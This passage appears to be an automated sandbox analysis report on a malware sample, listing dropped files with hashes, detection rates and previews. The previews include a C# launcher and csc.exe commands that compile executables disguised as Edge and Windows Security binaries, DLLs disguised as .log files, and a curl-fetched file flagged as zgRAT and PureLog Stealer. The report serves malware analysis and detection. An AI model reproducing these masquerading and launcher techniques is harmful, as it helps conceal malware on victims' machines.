SHA-512:	39C1AFED59E725BCE6AA85E4DEBD5C05350A37DFD896D0FB8B6E93C027ECF1769EE70A7B3EDAF25602ACAB9A5733B811AE60EC10FBDFE31F52DDD89095468028
Malicious:	false
Preview:	.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.0.cs

Download File

Process:	C:\Edge\msedge.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	421
Entropy (8bit):	5.087401750375484
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLAZ9EeiFkD:JNVQIbSfhWLzIiFkMSfhs9E/FkD
MD5:	E4D8D234B89D4275BBAB709DFC6BF8DC
SHA1:	B0A0860D0CB417006E180ACE5A282715FF2E3E73
SHA-256:	F97FE54A19650CDEDD52E9F02A55B81CB423E9B46231ACA30B7952F141707D77
SHA-512:	D221DCA457AC3F174AFA2ECE97736F6383F5C76B3CDBFD29B3F835C7567EF73219187077A82FE54F6D55A60B86EAFAC73228045891EEB49B6A28CA69AE606660
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	269
Entropy (8bit):	5.175808893658482
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8ocNwi23fzNx:Hu7L//TRRzscQlZr
MD5:	3FA53B6BBE776D5B4A361A017282311B
SHA1:	391B18EFC48DD7856225CD04255104155542FE5D
SHA-256:	6C7774EDFEC99C3666471D4CB43698FE799C29E03F5143FC858214823E74846C
SHA-512:	6D842F93544F0F139FD6E59228C1AD26820841F2D867D5026EA33DD8BDE98430DD87B58A0228545580DA5C1431E9D3E1430350E12EE1ACA60EA6BF2106514169
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.0.cs"

C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.out

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (333), with CRLF, CR line terminators
Category:	modified
Size (bytes):	754
Entropy (8bit):	5.274693290085745
Encrypted:	false
SSDEEP:	12:apI/u7L//TRRzscQlZqKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/VRzstDqKax5DqBVKVrdFAMBJj
MD5:	89C3A721B5A212A6E45223285591A012
SHA1:	D3EAD0370FF4EA54536E0FA850C2526D31E94DA5
SHA-256:	1556B41D726B358EE31992384AD858228416241A4A3F98BA3B8E3AA7843E0B0F
SHA-512:	B2E927A8EC15EAB739B30FBA5ABD65E4A557C104A21A9F7308048CBA9DB7CC9ACFE1DEE7DA555C723D02E6241165F57CE2AFC1F5757254E3DC3421D82FFF99CB
Malicious:	false
Preview:	.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\Desktop\ASIzYbXK.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Joe Sandbox View:	Filename: 0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe, Detection: malicious, Browse Filename: e416c0d0e2c49f0d5582d90727781330a012ebe541a60.exe, Detection: malicious, Browse Filename: p3f932IsTO.exe, Detection: malicious, Browse Filename: UpU2O6YQxG.exe, Detection: malicious, Browse Filename: 5WbBcHi91R.exe, Detection: malicious, Browse Filename: 4LU843t3Vt.exe, Detection: malicious, Browse Filename: ggJWCFp2S3.exe, Detection: malicious, Browse Filename: yQrCGtNgsf.exe, Detection: malicious, Browse Filename: qDlkXj5kcZ.exe, Detection: malicious, Browse Filename: C0laqZmkEf.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\BegQTYoT.log

Download File

Process:	C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\HiOQLkRz.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\KAbPIEds.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\OPvxZeSl.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\TqIVmuJi.log

Download File

Process:	C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\XkTUfoHN.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\ZcXEVMnO.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\aowVPJEW.log

Download File

Process:	C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\dZblWXPP.log

Download File

Process:	C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\fnSuHmrC.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\sozKoiId.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\uNKjQhPt.log

Download File

Process:	C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vpYzbqhQ.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xSuJhsEU.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\Speech\kdmapper.exe

Download File

Process:	C:\Windows\System32\curl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2284739
Entropy (8bit):	7.490456730492454
Encrypted:	false
SSDEEP:	24576:2TbBv5rUyXVRCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKY:IBJ1LLvax4Gmhscse1D
MD5:	C85ABE0E8C3C4D4C5044AEF6422B8218
SHA1:	F9A4DACEBF1DD80F54DA8C8AFE1DEDDAC99D381D
SHA-256:	7C388F4215D04EEA63A7D5BD9F3CADE715F285EA72DE0E43192FC9F34BAF7C52
SHA-512:	082F4924C624D9B35DFF185B582278E032D3FF230E48739D796BBA250B0807C498EF1B52F78B864AADB35DB0F65463035110C02B7D92DE4FB0A86902CCAD7CB5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 68%
